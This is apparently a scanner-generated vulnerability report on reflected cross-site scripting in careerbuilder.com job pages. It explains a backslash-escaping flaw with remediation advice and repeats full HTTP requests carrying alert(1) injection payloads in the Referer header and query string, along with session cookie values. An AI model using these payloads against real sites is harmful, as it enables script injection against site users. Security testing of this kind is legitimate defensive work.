Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Consulting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=33186\'%3balert(1)//aae926feec9
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174798
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR12
Date: Sun, 14 Nov 2010 22:57:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 33186\\';alert(1)//aae926feec9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31cf1\'%3balert(1)//319a1f8dbd9 was submitted in the Referer HTTP header. This input was echoed as 31cf1\\';alert(1)//319a1f8dbd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=31cf1\'%3balert(1)//319a1f8dbd9
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174910
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR36
Date: Sun, 14 Nov 2010 23:16:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 31cf1\\';alert(1)//319a1f8dbd9'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db50e\'%3balert(1)//163dd70bd93 was submitted in the Referer HTTP header. This input was echoed as db50e\\';alert(1)//163dd70bd93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=db50e\'%3balert(1)//163dd70bd93
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174965
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR19
Date: Sun, 14 Nov 2010 23:25:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - db50e\\';alert(1)//163dd70bd93'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0c5\'%3balert(1)//4d023b426f1 was submitted in the Referer HTTP header. This input was echoed as 1c0c5\\';alert(1)//4d023b426f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=1c0c5\'%3balert(1)//4d023b426f1
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174964
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR11
Date: Sun, 14 Nov 2010 23:18:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 1c0c5\\';alert(1)//4d023b426f1'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e622\'%3balert(1)//15847bde122 was submitted in the Referer HTTP header. This input was echoed as 5e622\\';alert(1)//15847bde122 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Executive.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=5e622\'%3balert(1)//15847bde122
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174898
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR33
Date: Sun, 14 Nov 2010 23:19:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5e622\\';alert(1)//15847bde122'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c113\'%3balert(1)//a10bfebdfb8 was submitted in the Referer HTTP header. This input was echoed as 3c113\\';alert(1)//a10bfebdfb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=3c113\'%3balert(1)//a10bfebdfb8
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174679
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR7
Date: Sun, 14 Nov 2010 23:25:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 3c113\\';alert(1)//a10bfebdfb8'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5f22\'%3balert(1)//74a8307aa4f was submitted in the Referer HTTP header. This input was echoed as b5f22\\';alert(1)//74a8307aa4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=b5f22\'%3balert(1)//74a8307aa4f
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 175164
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:26:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b5f22\\';alert(1)//74a8307aa4f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14e00\'%3balert(1)//7496d02a115 was submitted in the Referer HTTP header. This input was echoed as 14e00\\';alert(1)//7496d02a115 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Management.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=14e00\'%3balert(1)//7496d02a115
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174942
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 23:20:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 14e00\\';alert(1)//7496d02a115'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f717c\'%3balert(1)//431b53f18e was submitted in the Referer HTTP header. This input was echoed as f717c\\';alert(1)//431b53f18e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=f717c\'%3balert(1)//431b53f18e
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174812
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 23:26:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar5='JS_AS_City | State | Job Type'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f717c\\';alert(1)//431b53f18e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80589\'%3balert(1)//7e390f9d8e4 was submitted in the Referer HTTP header. This input was echoed as 80589\\';alert(1)//7e390f9d8e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ag.ic/Florida_Miami_Payroll.htm HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=80589\'%3balert(1)//7e390f9d8e4
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174595
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL5
Date: Sun, 14 Nov 2010 23:20:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
